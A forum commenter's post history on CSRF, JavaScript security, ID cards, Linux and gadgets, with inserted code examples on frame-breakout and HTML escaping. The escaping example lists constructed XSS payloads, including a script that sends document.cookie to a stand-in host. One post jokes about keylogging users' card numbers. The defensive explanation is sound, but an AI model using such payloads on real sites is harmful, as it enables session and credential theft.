50 posts • joined Saturday 26th May 2007 05:53 GMT
Just for the record the winning bid was £14,500.10. They must really have a sweet tooth. (Okay, it was all in aid of the Retail Trust charity.)
£10m bid? Oh, how the hoax bidders must have laughed.
csrf is subtle
Nothing technical about it. It can be coded either way. The server has all the same information. With broadband, conventional page reloading is not the tedium it once was with dial-up. I'm in agreement about the slick interface for an app feel. There are some very good ones out there. For the discussion of the article, however, the former does not demand JS, the latter cannot function without it. And JS opens up the prospect of CSRF...
It has nothing to do with phishing nor input validation. It is impersonation and forged requests. My website can be perfect but can still be the target of attacks from another site with XSS holes. But (and it's a big but) the requests are from my customers. I cannot distinguish real requests from forged ones unless I make user access such a pain that nobody wants to visit. With CSRF you'll realise there is almost no easy defence against it /and/ keep all your users. Hence the doom and gloom of the article.
To recap, it happens like this. We have four agents in this scenario.
- Bob, at home, using his browser.
- SiteA, perfect, with no XSS holes or anything. Perhaps a bank.
- Sid the bad guy who want to rip off Bob's account at SiteA.
(1) Sid puts malware on SiteB.
(2) Bob visits SiteA and logs into his account. SiteA sends Bob a cookie (a random token or nonce) so that further requests from his browser do not require him to re-enter his password for every requested page (a convenience feature).
(3) While still browsing SiteA, Bob opens up a new tab and surfs into SiteB.
(5) SiteA receives this request. It is coming from Bob's browser at his IP address along with Bob's cookie for SiteA. The server checks the cookie and sees that it's a valid cookie for Bob's current session and executes the request. Fill in the blanks of what the request could be. SiteA logs the request, IP address etc.
(6) Much later Bob complains to SiteA that his bank account is now empty. SiteA examines the logs and sees that it was Bob who made the request and tells him tough bananas.
While it is up to SiteA to do all they can to thwart this (they don't want customers being ripped off) you need to be aware of what might be going on while browsing. If you browse one site at a time, logout and delete cookies before going somewhere else then leaving JS on is just fine. If you like to have many tabs open (I do) then you need to make the necessary security adjustments. You could keep one browser strictly for online banking.
A long post but I hope it clears up why this is important. It's not that I hate JS (or Web 2.0), it's that it's too dangerous to just give it free rein for no really good reason.
If that's how you ensure your own security, knock yourself out.
I notice that you've not addressed the charge that running untrusted code on your own machine is dangerous. Do you wonder why noscript is the most popular add-on for Firefox? Or why IE is now copying it?
Sure, we could outlaw cookies (another solution), but then we have the session id problem. Embedded tokens only lead to either session fixation or a broken back button (the most used button on a browser) and do not fully fix the CSRF vulnerability. SSL ids for session ids is a good solution but has its own penalties. It's a tricksy problem and the devil is in the detail.
It is an imperfect universe filled with Windows and bad people who just won't play cricket. This isn't helped by client-side scripting languages with too much power and users who opt for convenience over security. I know, guns don't kill people but until there is sandboxing or virtual browsers or whatever it is a solution that works 100%.
Go and read the forums at the hacker sites and consider whether one should be doing everyday browsing with JS enabled?
Yes, it annoys me that in 2008 some sites resort to "enable JS or fuck off" for stuff that doesn't even need to be. JS links anyone? JS breaks the Web for the blind, disabled or anyone using a stylus. You know, that accessibility thing. Web 2.0 be damned. Does El Reg demand its users be JS-enabled? Even Gmail has a non-Web-2.0 interface that works really well.
JS is necessary for media type stuff hence my keeping Mozilla JS+Flash enabled to visit utoob. Actually, the new look Beeb site is a good example of providing accessibility and (semi-nagging) relevant alternatives to embedded Flash. The JS provides additional functionality not critical functionality. Web 2.0 stuff is pretty groovy and the slick interface seductive but there is nothing JS can do that cannot be done by a scripting server (I do it everyday).
JS has been given too much power and now it's being abused by those who want to steal your money. It's your choice: keep your accounts secure or create another million zombies.
Everything can be faked. See http://en.wikipedia.org/wiki/XHR
(1) Disable JS, Flash and other random downloaded code executors to mitigate the XHR problem.
(2) Log out when done and delete cookies - tell the browser to only use session cookies (Mozilla allows this).
(3) Only keep one browsing window open when visiting important sites to limit cookie exposure (and delete them when done)
(4) As suggested, use multiple browsers. I use Konqueror (no JS, no plugins, cookies) and Mozilla (JS, Flash, session cookies only) this way.
For web dev:
(1) Don't use JS and recommend users disable JS (a long shot but hey it's you that's being ripped off.)
(2) Add the following iframe breakout script to every page
If anyone tries to put your site in an (invisible or otherwise) iframe it will become pretty obvious to the user who will then (hopefully) contact the hosting site to say that something is horribly wrong and the webmaster can go and fix the XSS to whatever they are hosting.
location.href could be replaced with a redirect to some other site (so as not use your cookies) or to a page on your site that deletes your cookies on the browser to make them safe.
(3) Reconfirm credentials often. Keeping the sessions short to mitigate time at risk. And ask for passwords to authorise actions on really sensitive pages.
(4) As already suggested, random tokens to return to the site as GET or POST parameters will stop the less sophisticated attacks that do not scan for tokens. An advanced JS script with XHR can load a page, scan for the token value, insert it, post it back.
@Nick Clarke: a neat idea but a preprogrammed script could search for the JS rather than hidden input tags. It would need to be a big XSS hole but it's possible.
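The frame-breakout check from point (2) of the web-dev list above, as an added example (the poster's own script is not on the page; this is not it). The logic is pulled into a function that takes a window-like object so it can be exercised without a browser. The fakeWindow helper and the sitea.example/siteb.example URLs are constructed for the example; `escapeUrl` implements the variant from the follow-up of sending the user to a cookie-clearing page instead of reloading the site.

```javascript
// Added example, not the poster's script (which is not on the page): the
// frame-breakout check described in point (2), written so it can be exercised
// without a browser. `win` stands in for the page's window object; the
// fakeWindow helper and the sitea/siteb URLs are constructed for the example.

// Returns null when the page is top-level or framed by its own origin, else the
// URL the top window should be sent to: the page's own URL by default, or
// `escapeUrl` for the post's variant of redirecting to a cookie-clearing page.
function frameBreakoutTarget(win, escapeUrl) {
  if (win.top === win.self) return null;              // not framed at all
  let framerOrigin = null;
  try {
    framerOrigin = win.top.location.origin;           // throws when the framer is cross-origin
  } catch (e) {
    framerOrigin = null;                              // cross-origin framer: treat as hostile
  }
  if (framerOrigin === win.location.origin) return null;   // framed by ourselves
  return escapeUrl || win.location.href;
}

// In the page itself this is all that runs. Writing top.location is one of the
// few cross-origin operations a framed page is allowed to perform.
function breakOut(escapeUrl) {
  if (typeof window === 'undefined') return null;     // not in a browser (e.g. Node)
  const target = frameBreakoutTarget(window, escapeUrl);
  if (target) window.top.location.href = target;
  return target;
}

// Stand-in for a browser window. A framer on another origin is modelled the way
// browsers expose it: `top` exists but reading top.location throws.
function fakeWindow(href, framer) {
  const origin = new URL(href).origin;
  const win = { location: { href, origin } };
  win.self = win;
  if (!framer) {
    win.top = win;
  } else if (framer.location.origin === origin) {
    win.top = framer;
  } else {
    win.top = { get location() { throw new Error('SecurityError: cross-origin access'); } };
  }
  return win;
}
```

Two caveats a practitioner would add. First, a hostile framing page can neutralise script-based frame busting (for instance by sandboxing the iframe so it may not navigate the top window), so this makes framing visible rather than impossible. Second, the non-JS defence is a response header: `X-Frame-Options: DENY` (supported from IE8 onward) and, later, the CSP directive `frame-ancestors 'none'`, both of which stop the browser framing the page at all, which is the fix that matches the poster's preference for not relying on JS.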
late great bill hicks
@Hud who? Too true.
@Hud. Check out YouTube. You know the drill.
Looking at this optimistically, this can only be a good thing - a whole new generation will be turned on to his works and begin a journey of enlightenment and clearer thinking.
ID Cards are not about security
As we all know ID cards have nothing to do with security. The security experts all say it's about control. And a big fat gravy train for Herr Brown and chums.
'A National ID Card Wouldn't Make Us Safer'
'Ex-MI5 Chief Calls ID Cards "Useless"'
and many others...
hurrah! bsod descends on windows
Nasty. Being boiled is too good for them. More cruft for s'kiddies to abuse Windows lusers. Article is thin on how the worm propagates. I'm guessing that a firewall will keep the bugger out and that it's intended as an email attachment that will run an internal (Windows) intranet ragged.
And how does a UFD infect your machine? Does Windows really autorun from UFDs? Or is this U3 or whatever nonsense? Will Microsoft never learn. Doesn't affect Linux of course.
Anyway, as ever the cure is get a real OS and install Linux.
Re: Re: They're all wrong
billion as 10^12 "becoming obsolete"
Unfortunately the crimes committed against our beautiful language by our Septic Cousins seem to stick - but only in the English speaking world. The rest of the world still calls 10^9 milliard and 10^12 billion.
10^9 vs 2^30
This is a long standing bugbear. It's been long established, rightly or wrongly, that fs storage is measured using M=10^6 and G=10^9 whereas RAM has always been K=2^10 and M=2^20 and G=2^30 (more due to their intrinsic design requirements). I guess it's debatable which one applies to flash memory. Clearly the marketroids are going to go for the one that makes it look bigger. Traditionally communications and bitrates have always been powers of 10.
We have long had the prefix K=1024 so as not to confuse it with the SI unit of k=1000. But after that all bets are off. The other prefixes, whether "G" or "giga" are strictly SI units. So Creative are correct about using powers of 10 to describe gigabytes. Some smart folk came up with Ki/Mi/Gi (kibi/mebi/gibi and so on) for the powers of two. While they are a bit ugly, perhaps it's time to start using them. Linux already uses them for its utilities. Maybe The Reg can champion their use?!
So, I have a 4Gb UFD that is 4043Mb or 3948Mib.
UCE vs spam?
I always thought the first spam (vs UCE) appeared on Usenet (early '90s?) where two US lawyers cross-posted advert-laden messages across thousands of groups. Cross-posting on its own is a capital offence on Usenet but advertising as well! Regardless of the flame war they created, the two mother lovers were proud of their stunt.
My point is at the time there was differentiation between UCE (what is now email spam) and Usenet spam. I don't really see the need myself but some pedants at the time were quite adamant about insisting on the correct terminology...
Oh yeah, clicking on and/or buying from a spammed link should be punishable by public boiling.
Dilemma? Just fix it already, duh. I don't believe the airheads still using Windoze and allowing their machines to become zombies would even notice. And if it did go tits up how would they know it was the fix and not the zombie code? A fresh reinstall might well do their machine a world of good and rid it of any other parasites they are doubtless hosting.
Better still, install a keylogger, grab the lusers credit card number and order them a copy of F-Secure et al. D'ya think they'd get the message? Hell, why not just install Ubuntu and have done with it.
If TP leaves the network be, then the spammers will see these reports (if they haven't already) and reconfigure Kraken. TP will be back to where they started and the rest of us will continue to drown in invitations to buy dodgy rolexes and fake v1Agrrr.
An interesting idea
So many times when searching all I get is a blizzard of directory sites. Usually when looking for odd behaviour of product X and all that shows up is sites informing you of sites flogging product X. Excluding these sites from the search would be brilliant.
I guess they don't want to affect the global status of links thus the need to be logged in. Google won't spy on us surely? Nah. If we have to log in then maybe be able to create preset search parameters to make similar searches a breeze. (If Google are reading this!)
It would be useful to be able to tag or categorise sites and be able to include or exclude them when doing searches. Or be able to specify the type of site one is looking for. User tags might be more useful (and avoid sites keyword spamming) with some kind of evolution of the fittest process so that weak tags (left by some ranter) are eventually culled and the strongest appear first. Hey, sounds like a patent idea (TM).
Windows Live - Why?
Windows Live - Don't even think of visiting using Linux
Windows Live - When we suck, you suck too.
Windows Live - The world is not enough.
Windows Live - Assimilate and extend.
Windows Live - We are not a commodity.
Windows Live - Better dead than Windows.
Windows Live - You'll wish you were dead.
Windows Live - You'll wish M$ was dead.
Windows Live - Spam, not content.
Windows Live - Only one ActiveX plugin away...
Windows Live - Where clear thinkers dare to tread.
Windows Live - A World of Pain.
Windows Live - Abandon all hope.
outdated business model
Religion is nothing more than an outdated business model and, much like other businesses we've seen, its CEOs are clinging on to old ideas and suing all and sundry around them to have their way.
In its time it was the law when there wasn't law. It was about controlling the plebs. A commentary on how to behave in social situations and the like. Not eating swine is handy health advice in hot climes before the invention of the refrigerator. Now we have 'fridges it's redundant advice. Now we have our modern-day laws. Now we have science and understand there is no god or gods. Only atoms and the universe.
Science has demonstrated time and time again the fallacies in the various Good Books. Earth-centric universe anyone? Earth created 6kya? Total lack of mention of dinosaurs? How about the various "acts of god" demonstrating there is nobody out there or He is indifferent to human suffering. And while religious intolerance has caused more killing than anything else in human history I think the psychopaths in society will just find some other reason to kill each other.
I've read most of his books and I can see Dawkins is an astonishingly clear thinker. People are opening their eyes and seeing that the indoctrination they were subjected to as kids is just nonsense.
Religion is dying concept. Get over it.
stop the planet
This lunatic obsession with ID cards just never ends.
Stop the planet. I want to get off.
It's ironic that the two who thought they had a hot young date turn out to be both middle aged. The sadness is the guy then couldn't see the funny side and have a laugh over it and maybe make a good online friendship and instead became obsessed to the point of killing.
The BBC Worldservice podcast go into some detail about the incident. Get 'em while they're hot (only kept up for 7 days.) Look for chatroom murder 22 Nov 2007:
There must be some moral point to this story that presently escapes me...
Isn't Brontosaurus a deprecated designation for what is now officially Apatosaurus? Aww, hell. You're right, who cares.
One of my favourite units is the attoparsec. Very nearly 1 inch. Though it does seem pointless to introduce another unit for the much the same thing.
By "one secure location" you mean "central location unencumbered by passwords or encryption or anything allowing easy access by all and sundry."
I get it. The best way to prevent passwords being compromised is dispense with them altogether. Hurrah! We're secure!
Some people will never learn. Using biometrics for identification is a fatally flawed concept. A compromised password or bank account details is hassle but they can be replaced at the drop of a hat and normal life resumes. If the biometric hashes for your id are stolen what do you do? Get a new id? New fingerprints? Iris? Humm. Thought so. And it only has to be compromised once by some minimum-wage flunky...
This compromise demonstrates that no government department is fit to hold this data regardless of how much they promise to look after it.
Go and read Bruce Schneier's books (and others) for the grisly details.
I can only think that some chums of the current and previous Junta are setting up a big fat IT gravy train and they've seduced enough ministers into the ridiculous notion that it will somehow make the world a safe and happy place.
I remember some of the older geezers (the real UNIX grey beards) reminiscing over the PET when the Amiga was still king. They had fond memories. I was a bit too young at the time and was still drooling over Princess Leia (or was it R2D2) at the time. I love the Deep Thought photo.
A built-in cassette deck? How modern. Clearly Commodore didn't want any of this mucking around with cassette leads like we had to with the Speccy. It wasn't until the CPC when Sir Alan slapped a deck onto the side of his carbuncle.
I still have a Tatung Einstein and several Speccys and ZX81s around somewhere. The Amigas are still a joy to use. Doing stuff the upstarts of today can only dream about. Linux is the closest I'll ever get to the robustness and flexibility of the Amiga...
When I were a lad we used to 'ave to squeeze subroutine in't 100 bytes, graphics, sound an all, using hand crafted assembler, an't use ROM image for random numbers. And still have bytes left. You try telling that to the kids of today... and they won't believe you.
The rabbit commercials. That takes me back. I remember some spotty oik (was he from Grange Hill?) that said you can make calls wherever you see the 'rabbit' (sounds trippy now I say it).
My first 'phone was the Motorola v3688. I seem to remember it was called the v.small and the ads had a tiny baby tortoise crawling on it or something. Still pretty small but not as slim as today's models.
This mucking around with cameras, projectors, metamaterials and other advanced technology is altogether unnecessary. All one would need is a large octopus skin (or several sewn together) within which to enclose the tank and an octobrain as the central cloaking control mechanism. How hard can it be?
The War for Freedom. Part 2.
< Hey, is this Jobs Satan or Ballmer Satan?
To quote Kosh, "It begins."
Follow the money and you will likely find MS funding this. The close examination of Linux regarding patents and the like during the SCO fiasco will soon put these lusers to bed and hopefully, like SCO, permanently.
MS just don't like to share. The only way they are able to keep customers is to handcuff them to the radiator at gunpoint. It's sad that the only way to run a business is by threats and not the merit of your products.
Another quote (from memory) that springs to mind is from Princess Leia Organa, "The more you tighten your grip the more star systems will slip through your fingers."
At least bad drivers will be quickly and efficiently culled from the herd.
It sounds like a fab idea. Likely huge repercussions for society. Think of the mayhem as the paparazzi chase celebs around the sky. Weekend in Paris? Customs? Pah! Mobile phones won't work properly though (maybe a good thing). How will the speed Taliban persecute the motorists now? No more getting stuck on a windy road behind some doddery airhead towing a caravan...
Sky-loving Shill Alert!
Who's been suckling on Murdoch's oily teat then? Normally I'm not one to attack a person for their misguided views but such a brazen and offensive DTT hit piece could not go unremarked.
Analogue vs digital? Do you think anyone other than us geeks know or care about the underlying technology? You're fixating on the tech. To non-geeks it's just a TV channel. Nothing else.
Sky subscribers are a sad bunch of sheep. They get shafted paying an outrageous subscription for trash channels and are still inflicted with adverts! Rupert Murdoch is laughing in your faces.
Handing the TV monopoly to megalomaniac Murdoch? I guess you get your OS from Microsoft too? If we allow such a monopoly all we will end up with is shit on every channel targeted at the lowest common denominator (see Sky).
I take it you must be a marketeer's dreamboy. You eat at McDs, holiday at Disneyland, watch Sky and buy your jewellery from QVC (I'd say watch The Peter Serafinowicz Show but we know how much you hate the BBC).
I'd happily pay the TV licence just to fund the BBC and Channel 4. They are the only ones with (mostly) excellent and interesting programming. And I'll never give RM even a single penny. Ever.
Crucifixion's too good for these wankers polluting our lovely 'net. I can think of a better lingering death involving knitting needles and a hair drier. As for the tossers that actually respond to this shite...
Oh, don'tcha just love visiting The Reg after a night at the pub. Hey, what are these icon thingies?
<sigh> yet another case of self-inflicted foot in mouth disease. Anyone who wants to rip the movie will have done so. Punishing the users who are *actually paying money for the stuff* will end up with them returning the crap for a refund.
To Sony: remember this at your peril. Destroying customers' expectations will be rewarded by them being scared away from making further purchases. And in this market there is competition. Remember the Memory Stick incompatibility fiasco? I do.
Reading some of the above comments regarding software bundled with the player and re-reading the article I popped over to the Sony site and downloaded the manual.
Well, according to the manual it really does appear to do what it says on the tin: it mounts as a USB Mass Storage Device on your favourite OS. There is software bundled with the player called "AutoTransfer", and, as the article points out, it appears to essentially sync a designated music folder on your PC with the player. I assume the software is Windows only. The manual implies you can delete this software and accompanying PDF user manual and get a bit more space on the device.
Though ominously on the last page the manual then says that the only supported OSs are 2k, XP and Vista and if you want anything else you can go fuck yourself (or words to that effect.)
I'll contact Sony to confirm if it really is a USB Mass Storage Device, that they made a mistake and it will in actual fact support Linux...
What's happened to Sony?
Wow. Sony have finally realised the pretty gadgets laughingly called mp3 players (actually atrac players) are utterly pointless for anyone using Linux. Or OSX. Or no longer trusts Sony's software offerings. Looks like a groovy device. I might have to get one as a reward to Sony for finally seeing the light! Probably the F model with FM radio.
What with the RDR-HXDx70 series of recorders, it appears that Sony are waking up to producing stuff people want. Hurrah!
(Long time Sony fan but not tempted by their handiwork for many years. Poor design, poor build. That, and, along with everyone else on the planet, the unforgivable bandwagon jumping of lets not give anyone any choice even if they already have stuff in black, and love black, and hate anything not black, and go and paint everything that's lovely and wonderful that vile and hideous colour, that custard of Satan's loins, the wretched pustule encrusted silver. Grrr.)
John C. Dvorak and crankygeeks.com
"John C. Dvorak talked about this in his column weeks ago."
OT but, there's a link from the pcmag site to JCD's crankygeeks.com where he has a video magazine thingy. Watching the latest episode now (#83) and noticed there's some guy on the show called Drew Cullen from The Reg...
Amazing. Let's see if I've understood this.
(A) Use Google or OpenOffice giving unrestricted access to your files using standard open file formats.
or (B) Use a service that requires MS Office or restricts access to your files and uses non-standard closed proprietary file formats.
Humm, difficult choice.
>>"(5) You must point out spelling, grammer, calculator gaffes and other faux pas. Try not be overly smug."
>"...It's "GRAMMAR", you peasant!"
Oh, the irony.
(10) Do not ever forget this: your computer hates you. Features such as, say, the spell checker, will bite you back at a moment precisely calculated to be the most inconvenient and embarrassing.
(11) You must blame the computer for suboptimal processing of data in the vain hope of diverting attention away from one's failings.
(1) You must not talk about Reg Club
(2) You must not talk about Reg Club
(3) You must not, under any circumstances, ask what the IT angle is.
(4) The Reg is mother, The Reg is father, The Reg is your friend. Trust The Reg.
(5) You must point out spelling, grammer, calculator gaffes and other faux pas. Try not be overly smug.
(6) You must refer to anatomical features by anything other than established jargon or slang.
(7) You must not expect sympathy when, as a Windows/Explorer/Word/Excel luser, you get a virus/Trojan/worm/lose all your data/computer explodes.
(8) You are positively encouraged to indulge in bigging up Linux but please keep it brief. You're preaching to the choir.
(9) Sarcasm must not be delimited by <sarcasm> tags lest we be deprived of the frantic replies of the humour challenged among us.
just say no to js
Of course, XSS, can be prevented if the sites in question are ruthless with input filtering and html quoting. If. Having some js to do frame breakout will make iframe injection attacks pretty obvious. Ahh, frames. Don't you wish you could go back in time and give that smartarse at Netscape a good kicking. It would have been nice for a site to inform the browser that js should be disabled for this page regardless of any other setting or outer frames. But it's way too late for that.
CSRF is a trickier beast. It's your site (which naturally is perfect) being attacked by a badguy or compromised site. As the request comes from a legitimate user of your site, or technically from their browser, discriminating a genuine request from a bad one is a knotty problem. A solution being to ask for their password to confirm serious actions.
Or, ironically, have some js detection code to say "This site best viewed with JS off."
The joys of unintended consequences...
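The "html quoting" the post above leans on, as an added example (not code from the post): untrusted text is encoded at the point it is written into the page, so markup in a comment is displayed rather than executed, beside the kind of tag blocklist that is easy to slip past. The sample payloads are constructed for the example and sid.example is a made-up host.

```javascript
// Added example, not code from the post: the "html quoting" the post refers to,
// i.e. encoding untrusted text at the point it is written into the page, beside
// the kind of input blocklist that is easy to slip past. Sample inputs are
// constructed; sid.example is a made-up host.

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };

// Safe for HTML text content and for double- or single-quoted attribute values.
// Not safe for unquoted attributes, URLs, inline script or CSS: those contexts
// need their own encoders.
function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"']/g, ch => HTML_ESCAPES[ch]);
}

// How a small site might render a user comment: the author lands in a quoted
// attribute and in text, the body in text. Everything untrusted goes through
// escapeHtml on the way out, whatever was or was not filtered on the way in.
function renderComment(author, body) {
  return `<div class="comment" data-author="${escapeHtml(author)}">` +
         `<b>${escapeHtml(author)}</b>: ${escapeHtml(body)}</div>`;
}

// "Ruthless input filtering" as a blocklist: strips <script> blocks and nothing
// else. Kept here as the contrast, not as a recommendation.
function stripScriptTags(untrusted) {
  return String(untrusted).replace(/<script\b[^>]*>[\s\S]*?<\/script\s*>/gi, '');
}

// True when `html` still contains a real start tag for `tagName`, i.e. markup
// the browser would act on rather than display.
function containsTag(html, tagName) {
  return new RegExp(`<${tagName}[\\s>/]`, 'i').test(html);
}

// Constructed payloads of the kind a hole in a site would let an attacker post.
const COOKIE_THIEF = '<script>new Image().src="http://sid.example/?c="+document.cookie</script>';
const ATTRIBUTE_BREAKOUT = '" onmouseover="alert(1)';
const FILTER_BYPASS = '<img src=x onerror="alert(1)">';
```

The point of the contrast: the blocklist removes the obvious `<script>` case and nothing else, while output encoding neutralises the image/onerror payload and the attribute breakout without needing to know about them, because it changes how the browser parses the data rather than guessing what the data contains.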
You know what to do...
This is just one of the many reasons why 98SE was my last Windows. It's been said often enough and I fail to see why everyone is surprised when MS screws them, again.
Get Linux. Be in control of your own destiny.
I heard that chilli also speeds up the metabolism so you lose weight, or don't put it on, or something. At least that's how I understood it. Sounds as amazing as that wonder-cure-all herb, garlic.
Right, that's tonight's menu sorted then.
Hey, they're pretty cool if a little geeky. Would be a talking point at a party and depending on the type of party you could get twice the trip. And if they come with headphones, Terminator sound effects, real time object identification system and list of handy responses for when one's grey stuff is off playing with the pixies...
"...Google could care less about that though..." should be "couldn't care less" - it doesn't make sense otherwise, unless Google do want to release their code?
Google wanting to keep their own code as a trade secret is completely understandable. So long as it is in-house I don't see why there should be a problem. I guess they figure that such things like the search and ranking algorithms are part of what makes Google different from other search engines. I wouldn't be expected to release the code for my website just because I'm using a LAMP setup?
Of course, nobody's forced to use Google, Gmail etc, unlike, say, wanting to play the latest game, which pretty much demands Windows. (Though I do have Quake III for Linux.)
As for moving from Google webmail to Yahoo webmail (which I think is what you're suggesting) why would one want this? Sign up for both (they're free). Tell people one or the other depending on whichever has your favour that month. If it's not being tied to a single ISP that you're after get your own domain and redirect email to whomever you like.
"The system is now being run on 32 IBM HS21 high-density, dual-processor, dual core Blade Servers, which gives it 68 processors and 128 cores..."
That would be 64 processors, surely? (and don't call me Shirley)
As well as the usual stuff of not using IE nor Windows, if you need access to your online bank the simple solution is to boot from Knoppix. It being a live-CD that doesn't touch the hard disk you can use it with confidence even if you are uncertain about what may be lurking within your OS.
Connection to Ethernet modems is easy-peasy with DHCP - no configuration required. Your mileage might vary with a USB modem (throw it away and get a real modem). Even though I'm a happy Debian user I still use this technique to access my bank, just to be sure. Rebooting the machine is a hassle but it is *your* money that's at stake.